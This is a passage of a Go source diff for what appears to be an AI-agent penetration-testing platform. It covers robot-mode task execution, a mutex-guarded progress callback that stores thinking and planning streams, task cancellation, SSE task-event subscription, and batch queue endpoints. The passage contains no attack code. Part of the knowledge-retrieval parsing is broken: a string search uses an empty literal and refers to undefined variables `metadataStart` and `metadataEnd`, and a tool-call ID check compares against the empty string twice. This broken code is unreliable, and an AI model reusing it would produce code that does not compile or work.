nil { + return "", "", fmt.Errorf("对话不存在") + } + } + + agentHistoryMessages, err := h.loadHistoryFromAgentTrace(conversationID) + if err != nil { + historyMessages, getErr := h.db.GetMessages(conversationID) + if getErr != nil { + agentHistoryMessages = []agent.ChatMessage{} + } else { + agentHistoryMessages = make([]agent.ChatMessage, 0, len(historyMessages)) + for _, msg := range historyMessages { + agentHistoryMessages = append(agentHistoryMessages, agent.ChatMessage{Role: msg.Role, Content: msg.Content}) + } + } + } + + finalMessage := message + var roleTools []string + if role != "" && role != "默认" && h.config.Roles != nil { + if r, exists := h.config.Roles[role]; exists && r.Enabled { + if r.UserPrompt != "" { + finalMessage = r.UserPrompt + "\n\n" + message + } + roleTools = r.Tools + } + } + + if _, err = h.db.AddMessage(conversationID, "user", message, nil); err != nil { + return "", "", fmt.Errorf("保存用户消息失败: %w", err) + } + + // 与 Eino 流式对话一致:先创建助手消息占位,用 progressCallback 写过程详情(不发送 SSE) + assistantMsg, err := h.db.AddMessage(conversationID, "assistant", "处理中...", nil) + if err != nil { + h.logger.Warn("机器人:创建助手消息占位失败", zap.Error(err)) + } + var assistantMessageID string + if assistantMsg != nil { + assistantMessageID = assistantMsg.ID + } + + // 注册运行中任务并向 taskEventBus 镜像进度事件,供 Web 端 task-events 补流。 + taskCtx, cancelWithCause := context.WithCancelCause(ctx) + defer cancelWithCause(nil) + taskStatus := "completed" + defer func() { + h.tasks.FinishTask(conversationID, taskStatus) + }() + if _, err := h.tasks.StartTask(conversationID, message, cancelWithCause); err != nil { + if errors.Is(err, ErrTaskAlreadyRunning) { + return "", conversationID, fmt.Errorf("当前会话已有任务正在执行中,请稍后再试") + } + return "", conversationID, fmt.Errorf("无法启动任务: %w", err) + } + progressCallback := h.createProgressCallback(taskCtx, cancelWithCause, conversationID, assistantMessageID, nil) + + robotMode := "eino_single" + if h.config != nil { + robotMode = config.NormalizeRobotAgentMode(h.config.MultiAgent) + } + switch robotMode { + case "eino_single": + return h.runRobotEinoSingleWithRetry(taskCtx, conversationID, finalMessage, agentHistoryMessages, roleTools, progressCallback, assistantMessageID, &taskStatus) + case "deep", "plan_execute", "supervisor": + if h.config == nil || !h.config.MultiAgent.Enabled { + h.logger.Warn("机器人配置为多代理模式但未启用 multi_agent,回退 Eino 单代理", + zap.String("robot_mode", robotMode)) + return h.runRobotEinoSingleWithRetry(taskCtx, conversationID, finalMessage, agentHistoryMessages, roleTools, progressCallback, assistantMessageID, &taskStatus) + } + return h.runRobotMultiAgentWithRetry(taskCtx, conversationID, finalMessage, robotMode, agentHistoryMessages, roleTools, progressCallback, assistantMessageID, &taskStatus) + } + + taskStatus = "failed" + return "", conversationID, fmt.Errorf("不支持的机器人代理模式: %s", robotMode) +} + +// StreamEvent 流式事件 +type StreamEvent struct { + Type string `json:"type"` // conversation, progress, tool_call, tool_result, response, error, cancelled, done + Message string `json:"message"` // 显示消息 + Data interface{} `json:"data,omitempty"` +} + +// publishProgressToTaskEventBus 将进度事件镜像到 taskEventBus(机器人/无 HTTP SSE 客户端时供 Web task-events 订阅)。 +func (h *AgentHandler) publishProgressToTaskEventBus(conversationID, eventType, message string, data interface{}) { + if h == nil || h.taskEventBus == nil || strings.TrimSpace(conversationID) == "" { + return + } + event := StreamEvent{Type: eventType, Message: message, Data: data} + eventJSON, err := json.Marshal(event) + if err != nil { + return + } + sseLine := make([]byte, 0, len(eventJSON)+8) + sseLine = append(sseLine, []byte("data: ")...) + sseLine = append(sseLine, eventJSON...) + sseLine = append(sseLine, '\n', '\n') + h.taskEventBus.Publish(conversationID, sseLine) +} + +// createProgressCallback 创建进度回调函数,用于保存processDetails +// sendEventFunc: 可选的流式事件发送函数,如果为nil则不发送流式事件 +func (h *AgentHandler) createProgressCallback(runCtx context.Context, cancelRun context.CancelCauseFunc, conversationID, assistantMessageID string, sendEventFunc func(eventType, message string, data interface{})) agent.ProgressCallback { + // 用于保存tool_call事件中的参数,以便在tool_result时使用 + toolCallCache := make(map[string]map[string]interface{}) // toolCallId -> arguments + skillCallCache := make(map[string]string) // toolCallId -> skillName + skillToolName := "skill" + if h.config != nil { + if customName := strings.TrimSpace(h.config.MultiAgent.EinoSkills.SkillToolName); customName != "" { + skillToolName = customName + } + } + + extractSkillName := func(args map[string]interface{}) string { + if len(args) == 0 { + return "" + } + for _, key := range []string{"skill_name", "skillName", "name", "skill", "id", "skill_id", "skillId"} { + if v, ok := args[key]; ok { + switch vv := v.(type) { + case string: + if s := strings.TrimSpace(vv); s != "" { + return s + } + case map[string]interface{}: + for _, nestedKey := range []string{"name", "id", "skill_name", "skillId"} { + if nestedV, nestedOK := vv[nestedKey].(string); nestedOK { + if s := strings.TrimSpace(nestedV); s != "" { + return s + } + } + } + } + } + } + return "" + } + + // thinking_stream_*(ReAct 等助手正文流)与 reasoning_chain_stream_*(Eino ReasoningContent): + // 不逐条落库,按 streamId 聚合,flush 时分别落 thinking / reasoning_chain。 + type thinkingBuf struct { + b strings.Builder + meta map[string]interface{} + persistAs string // "thinking" | "reasoning_chain" + } + thinkingStreams := make(map[string]*thinkingBuf) // streamId -> buf + flushedThinking := make(map[string]bool) // streamId -> flushed + seenToolCallSigs := make(map[string]string) // toolCallId -> payload signature + seenToolResultSigs := make(map[string]string) // toolCallId -> payload signature + + // progressMu 保护闭包内 map 与聚合状态。Eino parallelRunToolCall 会在多 goroutine 中并发回调 + // progress(ToolInvokeNotifyHolder.Fire → createProgressCallback),未加锁的 map 会触发 fatal panic。 + var progressMu sync.Mutex + + // response_start + response_delta:前端时间线显示为「📝 规划中」(monitor.js),不落逐条 delta; + // 聚合为一条 planning 写入 process_details,刷新后与线上一致。 + var respPlan responsePlanAgg + flushResponsePlan := func() { + if assistantMessageID == "" { + return + } + content := strings.TrimSpace(respPlan.b.String()) + if content == "" { + respPlan.meta = nil + respPlan.b.Reset() + return + } + data := map[string]interface{}{ + "source": "response_stream", + } + for k, v := range respPlan.meta { + data[k] = v + } + if err := h.db.AddProcessDetail(assistantMessageID, conversationID, "planning", content, data); err != nil { + h.logger.Warn("保存过程详情失败", zap.Error(err), zap.String("eventType", "planning")) + } + respPlan.meta = nil + respPlan.b.Reset() + } + + flushThinkingStreams := func() { + if assistantMessageID == "" { + return + } + for sid, tb := range thinkingStreams { + if sid == "" || flushedThinking[sid] || tb == nil { + continue + } + content := strings.TrimSpace(tb.b.String()) + if content == "" { + flushedThinking[sid] = true + continue + } + data := map[string]interface{}{ + "streamId": sid, + } + for k, v := range tb.meta { + // 避免覆盖 streamId + if k == "streamId" { + continue + } + data[k] = v + } + persist := tb.persistAs + if persist != "reasoning_chain" { + persist = "thinking" + } + if err := h.db.AddProcessDetail(assistantMessageID, conversationID, persist, content, data); err != nil { + h.logger.Warn("保存过程详情失败", zap.Error(err), zap.String("eventType", persist)) + } + flushedThinking[sid] = true + } + } + + return func(eventType, message string, data interface{}) { + progressMu.Lock() + defer progressMu.Unlock() + + // 上游在重试/补偿时可能重复回调相同 tool_call/tool_result。 + // 这里做幂等过滤,保证前端展示和 process_details 都以唯一事件为准。 + if (eventType == "tool_call" || eventType == "tool_result") && data != nil { + if dataMap, ok := data.(map[string]interface{}); ok { + toolCallID := strings.TrimSpace(fmt.Sprint(dataMap["toolCallId"])) + if toolCallID != "" && toolCallID != "" { + payloadJSON, _ := json.Marshal(dataMap) + sig := eventType + "|" + message + "|" + string(payloadJSON) + seen := seenToolCallSigs + if eventType == "tool_result" { + seen = seenToolResultSigs + } + if prev, exists := seen[toolCallID]; exists && prev == sig { + h.logger.Debug("跳过重复工具进度事件", + zap.String("eventType", eventType), + zap.String("toolCallId", toolCallID)) + return + } + seen[toolCallID] = sig + } + } + } + + // 流式:写 HTTP SSE;非流式(机器人等):镜像到 taskEventBus 供 Web 订阅 + if sendEventFunc != nil { + sendEventFunc(eventType, message, data) + } else { + h.publishProgressToTaskEventBus(conversationID, eventType, message, data) + } + + // 保存tool_call事件中的参数 + if eventType == "tool_call" { + if dataMap, ok := data.(map[string]interface{}); ok { + toolName, _ := dataMap["toolName"].(string) + if toolName == builtin.ToolSearchKnowledgeBase { + if toolCallId, ok := dataMap["toolCallId"].(string); ok && toolCallId != "" { + if argumentsObj, ok := dataMap["argumentsObj"].(map[string]interface{}); ok { + toolCallCache[toolCallId] = argumentsObj + } + } + } + if strings.EqualFold(strings.TrimSpace(toolName), skillToolName) { + toolCallID, _ := dataMap["toolCallId"].(string) + if toolCallID != "" { + if argumentsObj, ok := dataMap["argumentsObj"].(map[string]interface{}); ok { + if skillName := extractSkillName(argumentsObj); skillName != "" { + skillCallCache[toolCallID] = skillName + } + } + } + } + } + } + + // 处理知识检索日志记录 + if eventType == "tool_result" && h.knowledgeManager != nil { + if dataMap, ok := data.(map[string]interface{}); ok { + toolName, _ := dataMap["toolName"].(string) + if toolName == builtin.ToolSearchKnowledgeBase { + // 提取检索信息 + query := "" + riskType := "" + var retrievedItems []string + + // 首先尝试从tool_call缓存中获取参数 + if toolCallId, ok := dataMap["toolCallId"].(string); ok && toolCallId != "" { + if cachedArgs, exists := toolCallCache[toolCallId]; exists { + if q, ok := cachedArgs["query"].(string); ok && q != "" { + query = q + } + if rt, ok := cachedArgs["risk_type"].(string); ok && rt != "" { + riskType = rt + } + // 使用后清理缓存 + delete(toolCallCache, toolCallId) + } + } + + // 如果缓存中没有,尝试从argumentsObj中提取 + if query == "" { + if arguments, ok := dataMap["argumentsObj"].(map[string]interface{}); ok { + if q, ok := arguments["query"].(string); ok && q != "" { + query = q + } + if rt, ok := arguments["risk_type"].(string); ok && rt != "" { + riskType = rt + } + } + } + + // 如果query仍然为空,尝试从result中提取(从结果文本的第一行) + if query == "" { + if result, ok := dataMap["result"].(string); ok && result != "" { + // 尝试从结果中提取查询内容(如果结果包含"未找到与查询 'xxx' 相关的知识") + if strings.Contains(result, "未找到与查询 '") { + start := strings.Index(result, "未找到与查询 '") + len("未找到与查询 '") + end := strings.Index(result[start:], "'") + if end > 0 { + query = result[start : start+end] + } + } + } + // 如果还是为空,使用默认值 + if query == "" { + query = "未知查询" + } + } + + // 从工具结果中提取检索到的知识项ID + // 结果格式:"找到 X 条相关知识:\n\n--- 结果 1 (相似度: XX.XX%) ---\n来源: [分类] 标题\n...\n" + if result, ok := dataMap["result"].(string); ok && result != "" { + // 尝试从元数据中提取知识项ID + metadataMatch := strings.Index(result, "") + if metadataEnd > 0 { + metadataJSON := result[metadataStart : metadataStart+metadataEnd] + var metadata map[string]interface{} + if err := json.Unmarshal([]byte(metadataJSON), &metadata); err == nil { + if meta, ok := metadata["_metadata"].(map[string]interface{}); ok { + if ids, ok := meta["retrievedItemIDs"].([]interface{}); ok { + retrievedItems = make([]string, 0, len(ids)) + for _, id := range ids { + if idStr, ok := id.(string); ok { + retrievedItems = append(retrievedItems, idStr) + } + } + } + } + } + } + } + + // 如果没有从元数据中提取到,但结果包含"找到 X 条",至少标记为有结果 + if len(retrievedItems) == 0 && strings.Contains(result, "找到") && !strings.Contains(result, "未找到") { + // 有结果,但无法准确提取ID,使用特殊标记 + retrievedItems = []string{"_has_results"} + } + } + + // 记录检索日志(异步,不阻塞) + go func() { + if err := h.knowledgeManager.LogRetrieval(conversationID, assistantMessageID, query, riskType, retrievedItems); err != nil { + h.logger.Warn("记录知识检索日志失败", zap.Error(err)) + } + }() + + // 添加知识检索事件到processDetails + if assistantMessageID != "" { + retrievalData := map[string]interface{}{ + "query": query, + "riskType": riskType, + "toolName": toolName, + } + if err := h.db.AddProcessDetail(assistantMessageID, conversationID, "knowledge_retrieval", fmt.Sprintf("检索知识: %s", query), retrievalData); err != nil { + h.logger.Warn("保存知识检索详情失败", zap.Error(err)) + } + } + } + } + } + + // 记录 skills 调用统计(tool_call + tool_result 关联) + if eventType == "tool_result" && h.db != nil { + if dataMap, ok := data.(map[string]interface{}); ok { + toolName, _ := dataMap["toolName"].(string) + if strings.EqualFold(strings.TrimSpace(toolName), skillToolName) { + toolCallID, _ := dataMap["toolCallId"].(string) + skillName := "" + if toolCallID != "" { + skillName = strings.TrimSpace(skillCallCache[toolCallID]) + delete(skillCallCache, toolCallID) + } + if skillName == "" { + if argumentsObj, ok := dataMap["argumentsObj"].(map[string]interface{}); ok { + skillName = strings.TrimSpace(extractSkillName(argumentsObj)) + } + } + if skillName != "" { + success, ok := dataMap["success"].(bool) + if !ok { + if isError, okErr := dataMap["isError"].(bool); okErr { + success = !isError + } + } + successCalls := 0 + failedCalls := 0 + if success { + successCalls = 1 + } else { + failedCalls = 1 + } + now := time.Now() + if err := h.db.UpdateSkillStats(skillName, 1, successCalls, failedCalls, &now); err != nil { + h.logger.Warn("更新Skills调用统计失败", zap.Error(err), zap.String("skill", skillName)) + } + } + } + } + } + + // 子代理回复流式增量不落库;结束时合并为一条 eino_agent_reply + if assistantMessageID != "" && eventType == "eino_agent_reply_stream_end" { + flushResponsePlan() + // 确保思考流在子代理回复前能持久化(刷新后可读) + flushThinkingStreams() + if err := h.db.AddProcessDetail(assistantMessageID, conversationID, "eino_agent_reply", message, data); err != nil { + h.logger.Warn("保存过程详情失败", zap.Error(err), zap.String("eventType", eventType)) + } + return + } + + // 多代理主代理「规划中」:response_start / response_delta 仅用于 SSE,聚合落一条 planning + if eventType == "response_start" { + if dataMap, ok := data.(map[string]interface{}); ok { + if sameResponseStreamMeta(respPlan.meta, dataMap) { + if respPlan.meta == nil { + respPlan.meta = make(map[string]interface{}, len(dataMap)) + } + for k, v := range dataMap { + respPlan.meta[k] = v + } + return + } + } + flushResponsePlan() + // 助手正文开始前,推理流通常已结束;落库以便刷新后「渗透测试详情」可回放 + flushThinkingStreams() + respPlan.meta = nil + if dataMap, ok := data.(map[string]interface{}); ok { + respPlan.meta = make(map[string]interface{}, len(dataMap)) + for k, v := range dataMap { + respPlan.meta[k] = v + } + } + respPlan.b.Reset() + return + } + if eventType == "response_delta" { + if dataMap, ok := data.(map[string]interface{}); ok { + if acc, okAcc := dataMap[openai.SSEAccumulatedKey].(string); okAcc { + respPlan.b.Reset() + respPlan.b.WriteString(acc) + } else { + respPlan.b.WriteString(message) + } + } else { + respPlan.b.WriteString(message) + } + if dataMap, ok := data.(map[string]interface{}); ok && respPlan.meta == nil { + respPlan.meta = make(map[string]interface{}, len(dataMap)) + for k, v := range dataMap { + respPlan.meta[k] = v + } + } else if dataMap, ok := data.(map[string]interface{}); ok { + for k, v := range dataMap { + respPlan.meta[k] = v + } + } + return + } + if eventType == "response" { + flushResponsePlan() + flushThinkingStreams() + return + } + if eventType == "done" { + flushResponsePlan() + flushThinkingStreams() + return + } + + // 流式思考/推理结束:聚合落库(与 eino_agent_reply_stream_end 同理) + if eventType == "thinking_stream_end" || eventType == "reasoning_chain_stream_end" { + flushResponsePlan() + flushThinkingStreams() + return + } + + // 聚合 thinking_stream_* / reasoning_chain_stream_*,不逐条落库 + if eventType == "thinking_stream_start" || eventType == "reasoning_chain_stream_start" { + persistAs := "thinking" + if eventType == "reasoning_chain_stream_start" { + persistAs = "reasoning_chain" + } + if dataMap, ok := data.(map[string]interface{}); ok { + if sid, ok2 := dataMap["streamId"].(string); ok2 && sid != "" { + tb := thinkingStreams[sid] + if tb == nil { + tb = &thinkingBuf{meta: map[string]interface{}{}, persistAs: persistAs} + thinkingStreams[sid] = tb + } else { + tb.persistAs = persistAs + } + // 记录元信息(source/einoAgent/einoRole/iteration 等) + for k, v := range dataMap { + tb.meta[k] = v + } + } + } + return + } + if eventType == "thinking_stream_delta" || eventType == "reasoning_chain_stream_delta" { + persistAs := "thinking" + if eventType == "reasoning_chain_stream_delta" { + persistAs = "reasoning_chain" + } + if dataMap, ok := data.(map[string]interface{}); ok { + if sid, ok2 := dataMap["streamId"].(string); ok2 && sid != "" { + tb := thinkingStreams[sid] + if tb == nil { + tb = &thinkingBuf{meta: map[string]interface{}{}, persistAs: persistAs} + thinkingStreams[sid] = tb + } else if tb.persistAs == "" { + tb.persistAs = persistAs + } + if acc, okAcc := dataMap[openai.SSEAccumulatedKey].(string); okAcc { + tb.b.Reset() + tb.b.WriteString(acc) + } else { + tb.b.WriteString(message) + } + // 有时 delta 先到 start 未到,补充元信息 + for k, v := range dataMap { + tb.meta[k] = v + } + } + } + return + } + + // 当 Agent 同时发送 *_stream_* 与同名 streamId 的 thinking/reasoning_chain 时, + // 流式聚合已会在 flushThinkingStreams() 落库;此处跳过逐条重复。 + if eventType == "thinking" || eventType == "reasoning_chain" { + if dataMap, ok := data.(map[string]interface{}); ok { + if sid, ok2 := dataMap["streamId"].(string); ok2 && sid != "" { + if tb, exists := thinkingStreams[sid]; exists && tb != nil { + if strings.TrimSpace(tb.b.String()) != "" { + return + } + } + if flushedThinking[sid] { + return + } + } + } + } + + // 保存过程详情到数据库(排除 response/done;response 正文已在 messages 表) + // response_start/response_delta 已聚合为 planning,不落逐条。 + if assistantMessageID != "" && + eventType != "response" && + eventType != "done" && + eventType != "response_start" && + eventType != "response_delta" && + eventType != "tool_result_delta" && + eventType != "eino_trace_run" && + eventType != "eino_trace_start" && + eventType != "eino_trace_end" && + eventType != "eino_trace_error" && + eventType != "eino_agent_reply_stream_start" && + eventType != "eino_agent_reply_stream_delta" && + eventType != "eino_agent_reply_stream_end" { + if eventType == "tool_result" { + discardPlanningIfEchoesToolResult(&respPlan, data) + } + // 在关键过程事件落库前,先把「规划中」与聚合中的 thinking / reasoning_chain 流落库 + flushResponsePlan() + flushThinkingStreams() + if err := h.db.AddProcessDetail(assistantMessageID, conversationID, eventType, message, data); err != nil { + h.logger.Warn("保存过程详情失败", zap.Error(err), zap.String("eventType", eventType)) + } + } + } +} + +// CancelAgentLoop 取消正在执行的任务 +func (h *AgentHandler) CancelAgentLoop(c *gin.Context) { + var req struct { + ConversationID string `json:"conversationId" binding:"required"` + Reason string `json:"reason,omitempty"` + ContinueAfter bool `json:"continueAfter,omitempty"` + } + + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + if req.ContinueAfter { + if h.tasks.GetTask(req.ConversationID) == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "未找到正在执行的任务"}) + return + } + execID := h.tasks.ActiveMCPExecutionID(req.ConversationID) + note := strings.TrimSpace(req.Reason) + if execID != "" { + if !h.agent.CancelMCPToolExecutionWithNote(execID, note) { + c.JSON(http.StatusNotFound, gin.H{"error": "未找到进行中的工具执行或该调用已结束"}) + return + } + h.logger.Info("对话页仅终止当前 MCP 工具", + zap.String("conversationId", req.ConversationID), + zap.String("executionId", execID), + zap.Bool("hasNote", note != ""), + ) + c.JSON(http.StatusOK, gin.H{ + "status": "tool_abort_requested", + "conversationId": req.ConversationID, + "executionId": execID, + "message": "已请求终止当前工具调用;工具返回后本轮推理将继续(与 MCP 监控页终止一致)。", + "continueAfter": true, + "interruptWithNote": note != "", + "continueWithoutTool": false, + }) + return + } + // 无进行中的 MCP 工具(模型纯推理/流式输出阶段):取消当前上下文并由 Eino 流式处理器合并用户补充后自动续跑。 + h.tasks.SetInterruptContinueNote(req.ConversationID, note) + ok, err := h.tasks.CancelTask(req.ConversationID, multiagent.ErrInterruptContinue) + if err != nil { + h.logger.Error("中断并继续(无工具)失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + if !ok { + c.JSON(http.StatusNotFound, gin.H{"error": "未找到正在执行的任务"}) + return + } + h.logger.Info("对话页中断并继续(无 MCP 工具,将自动续跑)", + zap.String("conversationId", req.ConversationID), + zap.Bool("hasNote", note != ""), + ) + c.JSON(http.StatusOK, gin.H{ + "status": "interrupt_continue_scheduled", + "conversationId": req.ConversationID, + "message": "已请求暂停当前推理;用户补充将合并到上下文并自动继续执行(无需整轮停止)。", + "continueAfter": true, + "interruptWithNote": note != "", + "continueWithoutTool": true, + }) + return + } + + var cause error = ErrTaskCancelled + msg := "已提交取消请求,任务将在当前步骤完成后停止。" + ok, err := h.tasks.CancelTask(req.ConversationID, cause) + if err != nil { + h.logger.Error("取消任务失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + if !ok { + c.JSON(http.StatusNotFound, gin.H{"error": "未找到正在执行的任务"}) + return + } + + c.JSON(http.StatusOK, gin.H{ + "status": "cancelling", + "conversationId": req.ConversationID, + "message": msg, + "continueAfter": false, + "interruptWithNote": false, + }) +} + +// SubscribeAgentTaskEvents GET SSE:订阅指定会话当前运行中任务的事件镜像(帧格式与 POST .../stream 一致),用于刷新页面或断线后接续 UI。 +func (h *AgentHandler) SubscribeAgentTaskEvents(c *gin.Context) { + conversationID := strings.TrimSpace(c.Query("conversationId")) + if conversationID == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "conversationId is required"}) + return + } + if h.tasks.GetTask(conversationID) == nil { + c.JSON(http.StatusNotFound, gin.H{"error": "no active task for this conversation"}) + return + } + if h.taskEventBus == nil { + c.JSON(http.StatusInternalServerError, gin.H{"error": "task event bus unavailable"}) + return + } + + c.Header("Content-Type", "text/event-stream; charset=utf-8") + c.Header("Cache-Control", "no-cache") + c.Header("Connection", "keep-alive") + c.Header("X-Accel-Buffering", "no") + + sub, ch := h.taskEventBus.Subscribe(conversationID) + defer h.taskEventBus.Unsubscribe(conversationID, sub) + + flusher, _ := c.Writer.(http.Flusher) + ctx := c.Request.Context() + + for { + select { + case <-ctx.Done(): + return + case chunk, ok := <-ch: + if !ok { + return + } + if _, err := c.Writer.Write(chunk); err != nil { + return + } + if flusher != nil { + flusher.Flush() + } + } + } +} + +// ListAgentTasks 列出所有运行中的任务 +func (h *AgentHandler) ListAgentTasks(c *gin.Context) { + c.JSON(http.StatusOK, gin.H{ + "tasks": h.tasks.GetActiveTasks(), + }) +} + +// ListCompletedTasks 列出最近完成的任务历史 +func (h *AgentHandler) ListCompletedTasks(c *gin.Context) { + c.JSON(http.StatusOK, gin.H{ + "tasks": h.tasks.GetCompletedTasks(), + }) +} + +// BatchTaskRequest 批量任务请求 +type BatchTaskRequest struct { + Title string `json:"title"` // 任务标题(可选) + Tasks []string `json:"tasks" binding:"required"` // 任务列表,每行一个任务 + Role string `json:"role,omitempty"` // 角色名称(可选,空字符串表示默认角色) + AgentMode string `json:"agentMode,omitempty"` // eino_single | deep | plan_execute | supervisor + ScheduleMode string `json:"scheduleMode,omitempty"` // manual | cron + CronExpr string `json:"cronExpr,omitempty"` // scheduleMode=cron 时必填 + ExecuteNow bool `json:"executeNow,omitempty"` // 创建后是否立即执行(默认 false) + ProjectID string `json:"projectId,omitempty"` // 队列内子对话绑定的项目(可选) +} + +// batchQueueWantsEino 队列是否配置为走 Eino 多代理。 +func batchQueueWantsEino(agentMode string) bool { + m := strings.TrimSpace(strings.ToLower(agentMode)) + return m == "deep" || m == "plan_execute" || m == "supervisor" +} + +func normalizeBatchQueueScheduleMode(mode string) string { + if strings.TrimSpace(mode) == "cron" { + return "cron" + } + return "manual" +} + +// CreateBatchQueue 创建批量任务队列 +func (h *AgentHandler) CreateBatchQueue(c *gin.Context) { + var req BatchTaskRequest + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + + if len(req.Tasks) == 0 { + c.JSON(http.StatusBadRequest, gin.H{"error": "任务列表不能为空"}) + return + } + + // 过滤空任务 + validTasks := make([]string, 0, len(req.Tasks)) + for _, task := range req.Tasks { + if task != "" { + validTasks = append(validTasks, task) + } + } + + if len(validTasks) == 0 { + c.JSON(http.StatusBadRequest, gin.H{"error": "没有有效的任务"}) + return + } + + agentMode := config.NormalizeAgentMode(req.AgentMode) + scheduleMode := normalizeBatchQueueScheduleMode(req.ScheduleMode) + cronExpr := strings.TrimSpace(req.CronExpr) + var nextRunAt *time.Time + if scheduleMode == "cron" { + if cronExpr == "" { + c.JSON(http.StatusBadRequest, gin.H{"error": "启用 Cron 调度时,调度表达式不能为空"}) + return + } + schedule, err := h.batchCronParser.Parse(cronExpr) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": "无效的 Cron 表达式: " + err.Error()}) + return + } + next := schedule.Next(time.Now()) + nextRunAt = &next + } + + queue, createErr := h.batchTaskManager.CreateBatchQueue(req.Title, req.Role, agentMode, scheduleMode, cronExpr, req.ProjectID, nextRunAt, validTasks) + if createErr != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": createErr.Error()}) + return + } + started := false + if req.ExecuteNow { + ok, err := h.startBatchQueueExecution(queue.ID, false) + if !ok { + c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"}) + return + } + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error(), "queueId": queue.ID}) + return + } + started = true + if refreshed, exists := h.batchTaskManager.GetBatchQueue(queue.ID); exists { + queue = refreshed + } + } + if h.audit != nil { + h.audit.RecordOK(c, "task", "create_queue", "创建批量任务队列", "batch_queue", queue.ID, map[string]interface{}{ + "task_count": len(validTasks), "started": started, + }) + } + c.JSON(http.StatusOK, gin.H{ + "queueId": queue.ID, + "queue": queue, + "started": started, + }) +} + +// GetBatchQueue 获取批量任务队列 +func (h *AgentHandler) GetBatchQueue(c *gin.Context) { + queueID := c.Param("queueId") + queue, exists := h.batchTaskManager.GetBatchQueue(queueID) + if !exists { + c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"}) + return + } + c.JSON(http.StatusOK, gin.H{"queue": queue}) +} + +// ListBatchQueuesResponse 批量任务队列列表响应 +type ListBatchQueuesResponse struct { + Queues []*BatchTaskQueue `json:"queues"` + Total int `json:"total"` + Page int `json:"page"` + PageSize int `json:"page_size"` + TotalPages int `json:"total_pages"` +} + +// ListBatchQueues 列出所有批量任务队列(支持筛选和分页) +func (h *AgentHandler) ListBatchQueues(c *gin.Context) { + limitStr := c.DefaultQuery("limit", "10") + offsetStr := c.DefaultQuery("offset", "0") + pageStr := c.Query("page") + status := c.Query("status") + keyword := c.Query("keyword") + + limit, _ := strconv.Atoi(limitStr) + offset, _ := strconv.Atoi(offsetStr) + page := 1 + + // 如果提供了page参数,优先使用page计算offset + if pageStr != "" { + if p, err := strconv.Atoi(pageStr); err == nil && p > 0 { + page = p + offset = (page - 1) * limit + } + } + + // 限制pageSize范围 + if limit <= 0 || limit > 100 { + limit = 10 + } + if offset < 0 { + offset = 0 + } + // 防止恶意大 offset 导致 DB 性能问题 + const maxOffset = 100000 + if offset > maxOffset { + offset = maxOffset + } + + // 默认status为"all" + if status == "" { + status = "all" + } + + // 获取队列列表和总数 + queues, total, err := h.batchTaskManager.ListQueues(limit, offset, status, keyword) + if err != nil { + h.logger.Error("获取批量任务队列列表失败", zap.Error(err)) + c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) + return + } + + // 计算总页数 + totalPages := (total + limit - 1) / limit + if totalPages == 0 { + totalPages = 1 + } + + // 如果使用offset计算page,需要重新计算 + if pageStr == "" { + page = (offset / limit) + 1 + } + + response := ListBatchQueuesResponse{ + Queues: queues, + Total: total, + Page: page, + PageSize: limit, + TotalPages: totalPages, + } + + c.JSON(http.StatusOK, response) +} + +// StartBatchQueue 开始执行批量任务队列 +func (h *AgentHandler) StartBatchQueue(c *gin.Context) { + queueID := c.Param("queueId") + ok, err := h.startBatchQueueExecution(queueID, false) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if !ok { + c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "task", "start_queue", "启动批量任务队列", "batch_queue", queueID, nil) + } + c.JSON(http.StatusOK, gin.H{"message": "批量任务已开始执行", "queueId": queueID}) +} + +// RerunBatchQueue 重跑批量任务队列(重置所有子任务后重新执行) +func (h *AgentHandler) RerunBatchQueue(c *gin.Context) { + queueID := c.Param("queueId") + queue, exists := h.batchTaskManager.GetBatchQueue(queueID) + if !exists { + c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在"}) + return + } + if queue.Status != "completed" && queue.Status != "cancelled" { + c.JSON(http.StatusBadRequest, gin.H{"error": "仅已完成或已取消的队列可以重跑"}) + return + } + if !h.batchTaskManager.ResetQueueForRerun(queueID) { + c.JSON(http.StatusInternalServerError, gin.H{"error": "重置队列失败"}) + return + } + ok, err := h.startBatchQueueExecution(queueID, false) + if err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if !ok { + c.JSON(http.StatusInternalServerError, gin.H{"error": "启动失败"}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "task", "rerun_queue", "重跑批量任务队列", "batch_queue", queueID, nil) + } + c.JSON(http.StatusOK, gin.H{"message": "批量任务已重新开始执行", "queueId": queueID}) +} + +// PauseBatchQueue 暂停批量任务队列 +func (h *AgentHandler) PauseBatchQueue(c *gin.Context) { + queueID := c.Param("queueId") + success := h.batchTaskManager.PauseQueue(queueID) + if !success { + c.JSON(http.StatusNotFound, gin.H{"error": "队列不存在或无法暂停"}) + return + } + if h.audit != nil { + h.audit.RecordOK(c, "task", "pause_queue", "暂停批量任务队列", "batch_queue", queueID, nil) + } + c.JSON(http.StatusOK, gin.H{"message": "批量任务已暂停"}) +} + +// UpdateBatchQueueMetadata 修改批量任务队列的标题、角色和代理模式 +func (h *AgentHandler) UpdateBatchQueueMetadata(c *gin.Context) { + queueID := c.Param("queueId") + var req struct { + Title string `json:"title"` + Role string `json:"role"` + AgentMode string `json:"agentMode"` + } + if err := c.ShouldBindJSON(&req); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + if err := h.batchTaskManager.UpdateQueueMetadata(queueID, req.Title, req.Role, req.AgentMode); err != nil { + c.JSON(http.StatusBadRequest, gin.H{"error": err.Error()}) + return + } + updated, _ := 